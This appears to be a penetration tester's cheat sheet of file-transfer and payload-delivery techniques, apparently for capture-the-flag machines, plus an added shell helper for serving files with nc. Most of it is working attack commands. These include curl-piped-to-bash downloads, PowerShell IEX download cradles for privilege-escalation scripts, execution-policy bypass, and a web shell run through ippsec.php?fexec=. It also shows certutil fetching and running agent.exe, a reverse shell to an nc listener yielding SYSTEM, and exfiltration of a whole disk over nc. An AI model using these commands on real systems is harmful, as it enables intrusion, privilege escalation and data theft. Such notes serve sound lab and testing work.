More
Curl
vim script.py
python -m SimpleHTTPServer 80 ..share
curl http://10.x.x.x:80/script.py -o /opt/tmp.py ..d/l overwrite
curl $MyIP:80/LinEnum.sh | bash ..d/l execute (linux)
curl --user david:Nowonly4me http://10.x.x.x/~david/
curl --user david:Nowonly4me --negotiate http://10.x.x.x/~david/
smbserver
Share from Linux SMB to Windows
locate smbserver.py ..find
cd /usr/share/doc/python3-impacket/examples ..prep
sudo python3 ./smbserver.py -smb2support share /tmp ..share (-smb2support: Windows 10+ clients refuse SMB1)
impacket-smbserver -smb2support share `pwd` ..another method; add -username x -password y if the client rejects guest access
smbclient -L 10.x.x.x --no-pass ..test
net view \\10.x.x.x ..windows command
net use z: \\10.x.x.x\share ..map a drive (share name as given to smbserver.py above)
copy "Oracle Issue.txt" z: ..copy file
dir \\10.x.x.x\share ..windows list directory
copy \\10.x.x.x\share\app C:\Windows\Temp\ ..windows copy
\\10.x.x.x\share\reverse.exe ..run
Windows Share
Linux: Copy to Windows Share
smbclient //10.x.x.x/sharename -U domain/username
Linux: Mount Windows Share
mkdir /mnt/smbshare
sudo mount -t cifs -o username=bob,password=xyz //serverfs/c$ /mnt/smbshare ..add ,vers=2.0 (or 3.0) if the mount fails on dialect negotiation
cd /mnt/smbshare
Windows: Copy to Windows Share
copy exploit.exe \\10.x.x.x\users\bob
HTTP Server One Liners
> python2 -m SimpleHTTPServer 80
> python3 -m http.server 80
> php -S 0.0.0.0:80 -t evil/ ..localhost would bind the loopback only
> while true; do nc -l 80 < test.html; done
> ncat -k -l -p 80 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat ~/evil.html"
> perl -MIO::All -e 'io(":80")->fork->accept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })'
> ruby -run -e httpd . -p 80
From inetd.conf:
> 80 stream tcp nowait nobody cat cat /somefile
... where /somefile has the HTTP response line, headers and body
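The nc and inetd one-liners above stream a pre-built file, so that file has to be a complete HTTP response: status line, headers, a blank line, then the body, with CRLF line endings and a correct Content-Length. The following POSIX shell helper, added here as an example and not part of the original notes, builds such a file; `build_http_response`, `response_header`, `response_body`, `payload.txt` and `response.bin` are names chosen for this example.

```shell
#!/bin/sh
# build_http_response FILE [CONTENT-TYPE]
# Write a complete HTTP/1.1 response for FILE to stdout: status line,
# headers, blank line, then the raw body bytes. Serve the result with
#   while true; do nc -l -p 80 < response.bin; done   (traditional nc)
#   while true; do nc -l 80 < response.bin; done      (OpenBSD nc)
# or via the inetd "cat /somefile" entry. Function and file names are
# this example's own choice.
build_http_response() {
    file=$1
    ctype=${2:-application/octet-stream}
    if [ ! -f "$file" ]; then
        echo "build_http_response: no such file: $file" >&2
        return 1
    fi
    # Exact byte count: without a correct Content-Length, curl or
    # PowerShell's WebClient may hang or truncate when the peer closes.
    len=$(wc -c < "$file" | tr -d ' ')
    # Header lines end in CRLF; an empty CRLF line terminates the headers.
    printf 'HTTP/1.1 200 OK\r\n'
    printf 'Content-Type: %s\r\n' "$ctype"
    printf 'Content-Length: %s\r\n' "$len"
    printf 'Connection: close\r\n'
    printf '\r\n'
    cat "$file"
}

# response_header RESPONSE NAME
# Print the value of header NAME from a generated response file (CR
# stripped), stopping at the blank line so body text is never matched.
response_header() {
    tr -d '\r' < "$1" | sed -n "/^$/q; s/^$2: //p"
}

# response_body RESPONSE
# Print exactly the bytes a client will save to disk, using the declared
# Content-Length so binary payloads are not mangled by line processing.
response_body() {
    len=$(response_header "$1" Content-Length)
    tail -c "$len" "$1"
}
```

Typical use: `build_http_response LinEnum.sh text/plain > response.bin`, then loop `nc -l -p 80 < response.bin` and fetch with `curl http://$MyIP/LinEnum.sh | bash`. Every request gets the same file regardless of path, which is fine for a one-shot transfer; use one of the real servers above when the target needs several files.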
Powershell
Share with Linux: python3 -m http.server
Download with Windows Powershell
----------------------
powershell.exe "(New-Object System.Net.WebClient).Downloadfile('http://$MyIP:8000/myfile','myfile')"
----------------------
echo IEX(New-Object Net.WebClient).DownloadString('http://<ip>:<port>/Sherlock.ps1') | powershell -noprofile
----------------------
echo $WebClient = New-Object System.Net.WebClient > wget.ps1
echo $WebClient.DownloadFile($Args[0],$Args[1]) >> wget.ps1
powershell -ExecutionPolicy Bypass -File wget.ps1 http://$MyIP:8000/file.exe file.exe
----------------------
http://10.x.x.x/ippsec.php?fexec=systeminfo
http://10.x.x.x/ippsec.php?fexec=echo IEX(New-Object Net.WebClient).DownloadString('http://10.x.x.x:8000/PowerUp.ps1')|powershell -noprofile
Powershell Advanced
Can't execute the payload?
Powershell ByPass Execution Policy
cd C:\ColdFusion8\ or:
cd C:\Windows\Temp
echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://$MyIP:4444/Chimichurri.exe" >>wget.ps1
echo $file = "Chimichurri.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Chimichurri.exe 10.10.14.x 5555
nc -nvlp 5555
connected ..system!!
smb setup issues
Run smbserver.py from Linux
Now Windows can share back to Linux
------------------------
Install Attempts:
python --version
python3 --version
apt-get install python3.6-dev libmysqlclient-dev
pip install --upgrade --user setuptools
sudo apt-get install libpcap-dev libpq-dev
pip3 install --upgrade --user setuptools
cd /opt/impacket
sudo -i
git clone https://github.com/SecureAuthCorp/impacket.git
pip install .
pip3 install .
python3 -m pip install -U pip
python3 -m pip install -U setuptools
pip install impacket
pip3 install impacket
smb setup impacket python2
Install the old pip (unofficial way)
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py
python get-pip.py
PATH=/home/kali/.local/bin:$PATH ..update PATH manually
pip --version ..confirm v2 not v3
pip 20.3.4 from /home/kali/.local/lib/python2.7/site-packages/pip (python 2.7)
pip install --upgrade setuptools
pip install impacket
smb optional
> impacket-smbserver share /path/to/myfolder ..plain path, not in backticks (the shell would try to execute it)
http://10.x.x.x/ippsec.php?fexec=\\10.x.x.x\share\privesc.exe whoami
nc
Easy:
nc -lp 4444 > out.file
nc -w 3 DestIP 4444 < out.file
Faster:
nc -lp 4444 | uncompress -c | tar xvfp -
tar cfp - /some/dir | compress -c | nc -w 3 DestIP 4444
Whole Hard Drive:
dd if=/dev/hda3 | gzip -9 | nc -l 3333
nc DestIP 3333 | pv -b > hdImage.img.gz
updog
Looks like an interesting option if you need SSL
updog
updog -p 4444 --ssl
updog -d /tmp --password mypax
ftp
anonymous, writable, port 2121
linux:
pip install pyftpdlib
python -m pyftpdlib -w
python3 -m pyftpdlib -p 21 -u mike -P paxx
windows:
ftp
open $MyIP
user mike paxx ..same credentials as the pyftpdlib line above
binary ..Windows ftp.exe has no passive mode, and its default ASCII mode corrupts .exe files
put localfilename remotefilename
bye
ftp -n < ftpcommands.txt ..optional (Windows: ftp -v -n -s:ftpcommands.txt; the file holds the open/user/binary/put/bye lines above)
Permission Trouble
You may have a permissions problem
Save and execute from the Temp folder!
cd C:\Windows\Temp\
copy \\10.x.x.x\share\myapp.exe .
myapp.exe
certutil
You can download files on Windows with this tool (this use of certutil is widely flagged by AV/EDR, so expect it to be blocked on hardened hosts)
rs.Exec("certutil -urlcache -split -f http://10.x.x.x/agent.exe C:\\users\\public\\agent.exe")
rs.Exec("cmd /c C:\\users\\public\\agent.exe") ..execute (backslashes escaped as in the line above)
http://10.x.x.x/UploadedFiles/web.config ..execute